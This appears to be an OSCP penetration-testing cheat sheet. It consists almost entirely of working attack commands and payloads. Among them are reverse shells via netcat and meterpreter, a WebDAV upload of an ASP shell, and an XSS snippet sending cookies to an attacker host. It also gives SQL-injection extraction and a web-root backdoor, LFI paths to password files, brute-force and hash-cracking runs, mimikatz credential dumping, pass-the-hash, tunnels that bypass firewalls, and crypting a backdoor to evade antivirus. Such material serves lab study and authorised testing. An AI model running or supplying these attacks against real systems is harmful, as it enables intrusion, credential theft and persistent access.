./usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl -k 3.0.0
Precompiled Linux Kernel Exploits - Super handy if GCC is not installed on the target machine!
Collect root password
cat /etc/shadow |grep root
Find and display the proof.txt or flag.txt - LOOT!
cat `find / -name proof.txt -print`
Windows Privilege Escalation resource http://www.fuzzysecurity.com/tutorials/16.html
Metasploit Meterpreter Privilege Escalation Guide https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
Try the obvious - Maybe the user is SYSTEM or is already part of the Administrator group:
whoami
net user "%username%"
Try the getsystem command using meterpreter - rarely works but is worth a try.
meterpreter > getsystem
No File Upload Required Windows Privlege Escalation Basic Information Gathering (based on the fuzzy security tutorial and windowsprivesccheck.py).
Copy and paste the following contents into your remote Windows shell in Kali to generate a quick report:
@echo --------- BASIC WINDOWS RECON --------- > report.txt timeout 1 net config Workstation >> report.txt timeout 1 systeminfo | findstr /B /C:"OS Name" /C:"OS Version" >> report.txt timeout 1 hostname >> report.txt timeout 1 net users >> report.txt timeout 1 ipconfig /all >> report.txt timeout 1 route print >> report.txt timeout 1 arp -A >> report.txt timeout 1 netstat -ano >> report.txt timeout 1 netsh firewall show state >> report.txt timeout 1 netsh firewall show config >> report.txt timeout 1 schtasks /query /fo LIST /v >> report.txt timeout 1 tasklist /SVC >> report.txt timeout 1 net start >> report.txt timeout 1 DRIVERQUERY >> report.txt timeout 1 reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated >> report.txt timeout 1 reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated >> report.txt timeout 1 dir /s *pass* == *cred* == *vnc* == *.config* >> report.txt timeout 1 findstr /si password *.xml *.ini *.txt >> report.txt timeout 1 reg query HKLM /f password /t REG_SZ /s >> report.txt timeout 1 reg query HKCU /f password /t REG_SZ /s >> report.txt timeout 1 dir "C:\" timeout 1 dir "C:\Program Files\" >> report.txt timeout 1 dir "C:\Program Files (x86)\" timeout 1 dir "C:\Users\" timeout 1 dir "C:\Users\Public\" timeout 1 echo REPORT COMPLETE!
Windows Server 2003 and IIS 6.0 WEBDAV Exploiting http://www.r00tsec.com/2011/09/exploiting-microsoft-iis-version-60.html
msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 -f asp > aspshell.txtcadavar http://$ip dav:/> put aspshell.txt Uploading aspshell.txt to
/aspshell.txt': Progress: [=============================>] 100.0% of 38468 bytes succeeded. dav:/> copy aspshell.txt aspshell3.asp;.txt Copying
/aspshell3.txt' to `/aspshell3.asp%3b.txt': succeeded. dav:/> exitmsf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 1.2.3.4 msf exploit(handler) > set LPORT 80 msf exploit(handler) > set ExitOnSession false msf exploit(handler) > exploit -j
curl http://$ip/aspshell3.asp;.txt
[] Started reverse TCP handler on 1.2.3.4:443 [] Starting the payload handler... [] Sending stage (957487 bytes) to 1.2.3.5 [] Meterpreter session 1 opened (1.2.3.4:443 -> 1.2.3.5:1063) at 2017-09-25 13:10:55 -0700
Windows privledge escalation exploits are often written in Python. So, it is necessary to compile the using pyinstaller.py into an executable and upload them to the remote server.
pip install pyinstaller wget -O exploit.py http://www.exploit-db.com/download/31853 python pyinstaller.py --onefile exploit.py
Windows Server 2003 and IIS 6.0 privledge escalation using impersonation:
https://www.exploit-db.com/exploits/6705/
https://github.com/Re4son/Churrasco
c:\Inetpub>churrasco churrasco /churrasco/-->Usage: Churrasco.exe [-d] "command to run"c:\Inetpub>churrasco -d "net user /add " c:\Inetpub>churrasco -d "net localgroup administrators /add" c:\Inetpub>churrasco -d "NET LOCALGROUP "Remote Desktop Users" /ADD"
Windows MS11-080 - http://www.exploit-db.com/exploits/18176/
python pyinstaller.py --onefile ms11-080.py mx11-080.exe -O XP
Powershell Exploits - You may find that some Windows privledge escalation exploits are written in Powershell. You may not have an interactive shell that allows you to enter the powershell prompt. Once the powershell script is uploaded to the server, here is a quick one liner to run a powershell command from a basic (cmd.exe) shell:
MS16-032 https://www.exploit-db.com/exploits/39719/
powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }"
Powershell Priv Escalation Tools https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
Windows Run As - Switching users in linux is trival with the
SUcommand. However, an equivalent command does not exist in Windows. Here are 3 ways to run a command as a different user in Windows.
Sysinternals psexec is a handy tool for running a command on a remote or local server as a specific user, given you have thier username and password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Psexec (on a 64 bit system).
C:\>psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"PsExec v2.2 - Execute processes remotely Copyright (C) 2001-2016 Mark Russinovich Sysinternals - www.sysinternals.com
Runas.exe is a handy windows tool that allows you to run a program as another user so long as you know thier password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Runas.exe:
C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe" Enter the password for Test: Attempting to start nc.exe as user "COMPUTERNAME\Test" ...
PowerShell can also be used to launch a process as another user. The following simple powershell script will run a reverse shell as the specified username and password.
$username = '' $password = '' $securePassword = ConvertTo-SecureString $password -AsPlainText -Force $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword Start-Process -FilePath C:\Users\Public\nc.exe -NoNewWindow -Credential $credential -ArgumentList ("-nc","192.168.1.10","4444","-e","cmd.exe") -WorkingDirectory C:\Users\Public
Next run this script using powershell.exe:
powershell -ExecutionPolicy ByPass -command "& { . C:\Users\public\PowerShellRunAs.ps1; }"
Windows Service Configuration Viewer - Check for misconfigurations in services that can lead to privilege escalation. You can replace the executable with your own and have windows execute whatever code you want as the privileged user.
icacls scsiaccess.exe
scsiaccess.exe NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) Everyone:(I)(F)
Compile a custom add user command in windows using C
[email protected]:~# cat useradd.c #include /* system, NULL, EXIT_FAILURE */ int main () { int i; i=system ("net localgroup administrators low /add"); return 0; }
i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c
Group Policy Preferences (GPP)
A common useful misconfiguration found in modern domain environments is unprotected Windows GPP settings files
map the Domain controller SYSVOL share
net use z:\\dc01\SYSVOL
Find the GPP file: Groups.xml
dir /s Groups.xml
Review the contents for passwords
type Groups.xml
Decrypt using GPP Decrypt
gpp-decrypt riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB
Find and display the proof.txt or flag.txt - get the loot!
#meterpreter > run post/windows/gather/win_privs
cd\ & dir /b /s proof.txt
type c:\pathto\proof.txt
ls -l /usr/share/webshells/
HTTP / HTTPS Webserver Enumeration
Essential Iceweasel Add-ons
Cookies Manager https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/
Tamper Data
https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
Cross Site Scripting (XSS)
significant impacts, such as cookie stealing and authentication bypass, redirecting the victim’s browser to a malicious HTML page, and more
Browser Redirection and IFRAME Injection
<iframe SRC="http://$ip/report" height = "0" width="0">iframe>
Stealing Cookies and Session Information
<javascript>
new image().src="http://$ip/bogus.php?output="+document.cookie;
</script>
nc -nlvp 80
## File Inclusion Vulnerabilities
fimap - There is a Python tool called fimap which can be leveraged to automate the exploitation of LFI/RFI vulnerabilities that are found in PHP (sqlmap for LFI):
https://github.com/kurobeats/fimap
For Local File Inclusions look for the include() function in PHP code.
include("lang/".$_COOKIE['lang']);
include($_GET['page'].".php");
LFI - Encode and Decode a file using base64
curl -s \
"http://$ip/?page=php://filter/convert.base64-encode/resource=index" \
| grep -e '\[^\\ \]\\{40,\\}' | base64 -d
LFI - Download file with base 64 encoding
http://$ip/index.php?page=php://filter/convert.base64-encode/resource=admin.php
LFI Linux Files:
/etc/issue
/proc/version
/etc/profile
/etc/passwd
/etc/passwd
/etc/shadow
/root/.bash_history
/var/log/dmessage
/var/mail/root
/var/spool/cron/crontabs/root
LFI Windows Files:
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\repair\SAM
%WINDIR%\win.ini
%SYSTEMDRIVE%\boot.ini
%WINDIR%\Panther\sysprep.inf
%WINDIR%\system32\config\AppEvent.Evt
LFI OSX Files:
/etc/fstab
/etc/master.passwd
/etc/resolv.conf
/etc/sudoers
/etc/sysctl.conf
LFI - Download passwords file
http://$ip/index.php?page=/etc/passwd
http://$ip/index.php?file=../../../../etc/passwd
LFI - Download passwords file with filter evasion
http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd
Local File Inclusion - In versions of PHP below 5.3 we can terminate with null byte
GET /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00
Contaminating Log Files
For a Remote File Inclusion look for php code that is not sanitized and passed to the PHP include function and the php.ini file must be configured to allow remote files
/etc/php5/cgi/php.ini - "allowurlfopen" and "allowurlinclude" both set to "on"
include($_REQUEST["file"].".php");
Remote File Inclusion
http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt
Another site is rextester.com:
http://rextester.com/l/mysqlonlinecompiler * Detecting SQL Injection Vulnerabilities.
Most modern automated scanner tools use time delay techniques to detect SQL injection vulnerabilities. This method can tell you if a SQL injection vulnerability is present even if it is a "blind" sql injection vulnerabilit that does not provide any data back. You know your SQL injection is working when the server takes a LOooooong time to respond. I have added a line comment at the end of each injection statement just in case there is additional SQL code after the injection point.
MSSQL Server SQL Injection Time Delay Detection: Add a 30 second delay to a MSSQL Server Query
Original Query
SELECT * FROM products WHERE name='Test';
Injection Value
'; WAITFOR DELAY '00:00:30'; --
Resulting Query
SELECT * FROM products WHERE name='Test'; WAITFOR DELAY '00:00:30'; --
MySQL Injection Time Delay Detection: Add a 30 second delay to a MySQL Query
Original Query
SELECT * FROM products WHERE name='Test';
Injection Value
'-SLEEP(30); #
Resulting Query
SELECT * FROM products WHERE name='Test'-SLEEP(30); #
PostGreSQL Injection Time Delay Detection: Add a 30 second delay to an PostGreSQL Query
Original Query
SELECT * FROM products WHERE name='Test';
Injection Value
'; SELECT pg_sleep(30); --
Resulting Query
SELECT * FROM products WHERE name='Test'; SELECT pg_sleep(30); --
Grab password hashes from a web application mysql database called “Users” - once you have the MySQL root username and password
mysql -u root -p -h $ip use "Users" show tables; select \* from users;
Authentication Bypass
name='wronguser' or 1=1; name='wronguser' or 1=1 LIMIT 1;
Enumerating the Database
http://192.168.11.35/comment.php?id=738)'
Verbose error message?
http://$ip/comment.php?id=738 order by 1
http://$ip/comment.php?id=738 union all select 1,2,3,4,5,6
Determine MySQL Version:
http://$ip/comment.php?id=738 union all select 1,2,3,4,@@version,6
Current user being used for the database connection:
http://$ip/comment.php?id=738 union all select 1,2,3,4,user(),6
Enumerate database tables and column structures
http://$ip/comment.php?id=738 union all select 1,2,3,4,table_name,6 FROM information_schema.tables
Target the users table in the database
http://$ip/comment.php?id=738 union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users'
Extract the name and password
http://$ip/comment.php?id=738 union select 1,2,3,4,concat(name,0x3a, password),6 FROM users
Create a backdoor
http://$ip/comment.php?id=738 union all select 1,2,3,4,"",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
SQLMap Examples
Crawl the links
sqlmap -u http://$ip --crawl=1
sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3
SQLMap Search for databases against a suspected GET SQL Injection
sqlmap –u http://$ip/blog/index.php?search –dbs
SQLMap dump tables from database oscommerce at GET SQL injection
sqlmap –u http://$ip/blog/index.php?search= –dbs –D oscommerce –tables –dumps
SQLMap GET Parameter command
sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --dump -threads=5
SQLMap Post Username parameter
sqlmap -u http://$ip/login.php --method=POST --data="[email protected]&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --dump-all
SQL Map OS Shell
sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --osshell
sqlmap -u http://$ip/login.php --method=POST --data="[email protected]&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --os-shell
Automated sqlmap scan
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php"
Targeted sqlmap scan
sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump
Scan url for union + error based injection with mysql backend and use a random user agent + database dump
sqlmap -o -u http://$ip/index.php --forms --dbs
sqlmap -o -u "http://$ip/form/" --forms
Sqlmap check form for injection
sqlmap -o -u "http://$ip/vuln-form" --forms -D database-name -T users --dump
Enumerate databases
sqlmap --dbms=mysql -u "$URL" --dbs
Enumerate tables from a specific database
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables
Dump table data from a specific database and table
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump
Specify parameter to exploit
sqlmap --dbms=mysql -u "http://www.example.com/param1=value1¶m2=value2" --dbs -p param2
Specify parameter to exploit in 'nice' URIs (exploits param1)
sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs
Get OS shell
sqlmap --dbms=mysql -u "$URL" --os-shell
Get SQL shell
sqlmap --dbms=mysql -u "$URL" --sql-shell
SQL query
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"
Use Tor Socks5 proxy
sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs
NoSQLMap Examples You may encounter NoSQL instances like MongoDB in your OSCP journies (
/cgi-bin/mongo/2.2.3/dbparse.py). NoSQLMap can help you to automate NoSQLDatabase enumeration.
NoSQLMap Installation
git clone https://github.com/codingo/NoSQLMap.git
cd NoSQLMap/
ls
pip install couchdb
pip install pbkdf2
pip install ipcalc
python nosqlmap.py
Often you can create an exception dump message with MongoDB using a malformed NoSQLQuery such as:
a'; return this.a != 'BadData’'; var dummy='!
Convert multiple webpages into a word list
for x in 'index' 'about' 'post' 'contact' ; do \
curl http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' >> webapp.txt ; \
done
Or convert html to word list dict
html2dic index.html.out | sort -u > index-html.dict
Default Usernames and Passwords
Brute Force
nmap --script brute -Pn
nmap --script=mysql-brute $ip
Dictionary Files
cd /usr/share/wordlists
Key-space Brute Force
crunch 6 6 0123456789ABCDEF -o crunch1.txt
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
crunch 8 8 -t ,@@^^%%%
Pwdump and Fgdump - Security Accounts Manager (SAM)
pwdump.exe- attempts to extract password hashes
fgdump.exe- attempts to kill local antiviruses before attempting to dump the password hashes and cached credentials.
Windows Credential Editor (WCE)
wce -w
Mimikatz
extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets
https://github.com/gentilkiwi/mimikatz From metasploit meterpreter (must have System level access):
meterpreter> load mimikatz meterpreter> help mimikatz meterpreter> msv meterpreter> kerberos meterpreter> mimikatz_command -f samdump::hashes meterpreter> mimikatz_command -f sekurlsa::searchPasswords
Password Profiling
cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt
Password Mutating
john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt
Medusa
medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10
Ncrack
ncrack -vv --user offsec -P password-file.txt rdp://$ip
Hydra
Hydra brute force against SNMP
hydra -P password-file.txt -v $ip snmp
Hydra FTP known user and rockyou password list
hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp
Hydra SSH using list of users and passwords
hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh
Hydra SSH using a known password and a username list
hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh
Hydra SSH Against Known username on port 22
hydra $ip -s 22 ssh -l -P big_wordlist.txt
Hydra POP3 Brute Force
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V
Hydra SMTP Brute Force
hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V
Hydra attack http get 401 login with a dictionary
hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin
Hydra attack Windows Remote Desktop with rockyou
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
Hydra brute force SMB user with rockyou:
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb
Hydra brute force a Wordpress admin login
hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
apt-get install libhwloc-dev ocl-icd-dev ocl-icd-opencl-dev
and
apt-get install pocl-opencl-icd
Cracking Linux Hashes - /etc/shadow file
500 | md5crypt $1$, MD5(Unix) | Operating-Systems 3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems 7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems 1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
Cracking Windows Hashes
3000 | LM | Operating-Systems 1000 | NTLM | Operating-Systems
Cracking Common Application Hashes
900 | MD4 | Raw Hash 0 | MD5 | Raw Hash 5100 | Half MD5 | Raw Hash 100 | SHA1 | Raw Hash 10800 | SHA-384 | Raw Hash 1400 | SHA-256 | Raw Hash 1700 | SHA-512 | Raw Hash
Create a .hash file with all the hashes you want to crack puthasheshere.hash:
$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/
Hashcat example cracking Linux md5crypt passwords $1$ using rockyou:
hashcat --force -m 500 -a 0 -o found1.txt --remove puthasheshere.hash /usr/share/wordlists/rockyou.txt
Wordpress sample hash:
$P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/
Wordpress clear text:
test
Hashcat example cracking Wordpress passwords using rockyou:
hashcat --force -m 400 -a 0 -o found1.txt --remove wphash.hash /usr/share/wordlists/rockyou.txt* Sample Hashes
`hash-identifier`
To crack linux hashes you must first unshadow them:
unshadow passwd-file.txt shadow-file.txt
unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
John the Ripper - Password Hash Cracking
john $ip.pwdump
john --wordlist=/usr/share/wordlists/rockyou.txt hashes
john --rules --wordlist=/usr/share/wordlists/rockyou.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
JTR forced descrypt cracking with wordlist
john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt
JTR forced descrypt brute force cracking
john --format=descrypt hash --show
Passing the Hash in Windows
Use Metasploit to exploit one of the SMB servers in the labs. Dump the password hashes and attempt a pass-the-hash attack against another system:
export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896
pth-winexe -U administrator //$ip cmd
Port Forwarding - accept traffic on a given IP address and port and redirect it to a different IP address and port
apt-get install rinetd
cat /etc/rinetd.conf
# bindadress bindport connectaddress connectport w.x.y.z 53 a.b.c.d 80
SSH Local Port Forwarding: supports bi-directional communication channels
ssh -L ::
SSH Remote Port Forwarding: Suitable for popping a remote shell on an internal non routable network
ssh -R ::
SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local attacking box to tunnel ALL incoming traffic to ANY host in the DMZ network on ANY PORT
ssh -D -p
Proxychains - Perform nmap scan within a DMZ from an external computer
Create reverse SSH tunnel from Popped machine on :2222
ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com
ssh -f -N -R 2222::22 [email protected]
Create a Dynamic application-level port forward on 8080 thru 2222
ssh -f -N -D :8080 -p 2222 [email protected]
Leverage the SSH SOCKS server to perform Nmap scan on network using proxy chains
proxychains nmap --top-ports=20 -sT -Pn $ip/24
HTTP Tunneling
nc -vvn $ip 8888
Traffic Encapsulation - Bypassing deep packet inspection
sudo hts -F : 80On client side:
sudo htc -P -F :80 stunnel
Tunnel Remote Desktop (RDP) from a Popped Windows machine to your network
Tunnel on port 22
plink -l root -pw pass -R 3389::3389
Port 22 blocked? Try port 80? or 443?
plink -l root -pw 23847sd98sdf987sf98732 -R 3389::3389 -P80
Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel (bypass deep packet inspection)
netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
Start the http tunnel client
httptunnel_client.exe
Create HTTP reverse shell by connecting to localhost port 3000
plink -l root -pw 23847sd98sdf987sf98732 -R 3389::3389 -P 3000
VLAN Hopping
git clone https://github.com/nccgroup/vlan-hopping.git
chmod 700 frogger.sh
./frogger.sh
VPN Hacking
./udp-protocol-scanner.pl -p ike $ip
./udp-protocol-scanner.pl -p ike -f ip.txt
Use IKEForce to enumerate or dictionary attack VPN servers:
pip install pyip
git clone https://github.com/SpiderLabs/ikeforce.git
Perform IKE VPN enumeration with IKEForce:
./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic
Bruteforce IKE VPN using IKEForce:
./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1Use ike-scan to capture the PSK hash:
ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
ike-scan –M –A –n example\_group -P hash-file.txt TARGET-IP
Use psk-crack to crack the PSK hash
psk-crack hash-file.txt
pskcrack
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key
PPTP Hacking
Identifying PPTP, it listens on TCP: 1723
NMAP PPTP Fingerprint:
nmap –Pn -sV -p 1723 TARGET(S)PPTP Dictionary Attack
thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst
Port Forwarding/Redirection
PuTTY Link tunnel - SSH Tunneling
Forward remote port to local address:
plink.exe -P 22 -l root -pw "1337" -R 445::445
SSH Pivoting
SSH pivoting from one network to another:
ssh -D :1010 -p 22 [email protected]
DNS Tunneling
Attacking Machine Installation:
apt-get update
apt-get -y install ruby-dev git make g++
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install
Run dnscat2:
ruby ./dnscat2.rb dnscat2> New session established: 1422 dnscat2> session -i 1422
Target Machine:
https://downloads.skullsecurity.org/dnscat2/
https://github.com/lukebaggett/dnscat2-powershell/
dnscat --host
See Metasploit Unleashed Course in the Essentials
Search for exploits using Metasploit GitHub framework source code:
https://github.com/rapid7/metasploit-framework
Translate them for use on OSCP LAB or EXAM.
Metasploit
MetaSploit requires Postfresql
systemctl start postgresql
To enable Postgresql on startup
systemctl enable postgresql
MSF Syntax
Start metasploit
msfconsole
msfconsole -q
Show help for command
show -h
Show Auxiliary modules
show auxiliary
Use a module
use auxiliary/scanner/snmp/snmp_enum use auxiliary/scanner/http/webdav_scanner use auxiliary/scanner/smb/smb_version use auxiliary/scanner/ftp/ftp_login use exploit/windows/pop3/seattlelab_pass
Show the basic information for a module
info
Show the configuration parameters for a module
show options
Set options for a module
set RHOSTS 192.168.1.1-254 set THREADS 10
Run the module
run
Execute an Exploit
exploit
Search for a module
search type:auxiliary login
Metasploit Database Access
Show all hosts discovered in the MSF database
hosts
Scan for hosts and store them in the MSF database
db_nmap
Search machines for specific ports in MSF database
services -p 443
Leverage MSF database to scan SMB ports (auto-completed rhosts)
services -p 443 --rhosts
Staged and Non-staged
MS 17-010 - EternalBlue
First step is to configure the Kali to work with wine 32bit
dpkg --add-architecture i386 && apt-get update && apt-get install wine32 rm -r ~/.wine wine cmd.exe exit
2. Download the exploit repostory `https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit`
Move the exploit to
/usr/share/metasploit-framework/modules/exploits/windows/smb
or~/.msf4/modules/exploits/windows/smb
Start metasploit console
I found that using spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.
use exploit/windows/smb/eternalblue_doublepulsar msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10 RHOST => 10.10.10.10 msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe PROCESSINJECT => spoolsv.exe msf exploit(eternalblue_doublepulsar) > run
Experimenting with Meterpreter
Get system information from Meterpreter Shell
sysinfo
Get user id from Meterpreter Shell
getuid
Search for a file
search -f *pass*.txt
Upload a file
upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec
Download a file
download c:\\Windows\\system32\\calc.exe /tmp/calc.exe
Invoke a command shell from Meterpreter Shell
shell
Exit the meterpreter shell
exit
Metasploit Exploit Multi Handler
multi/handler to accept an incoming reversehttpsmeterpreter
payload use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_https set LHOST $ip set LPORT 443 exploit [*] Started HTTPS reverse handler on https://$ip:443/
Building Your Own MSF Module
mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp /usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb ./crossfire.rb
nano crossfire.rb
Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
downloadDownload a file or directory
uploadUpload a file or directory
portfwdForward a local port to a remote service
routeView and modify the routing table
keyscan_startStart capturing keystrokes
keyscan_stopStop capturing keystrokes
screenshotGrab a screenshot of the interactive desktop
record_micRecord audio from the default microphone for X seconds
webcam_snapTake a snapshot from the specified webcam
getsystemAttempt to elevate your privilege to that of local system.
hashdumpDumps the contents of the SAM database
Meterpreter Post Exploitation Features
Create a Meterpreter background session
background
Crypting Known Malware with Software Protectors
One such open source crypter, called Hyperion
cp /usr/share/windows-binaries/Hyperion-1.0.zip
unzip Hyperion-1.0.zip
cd Hyperion-1.0/
i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll .
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll .
wine hyperion.exe ../backdoor.exe ../crypted.exe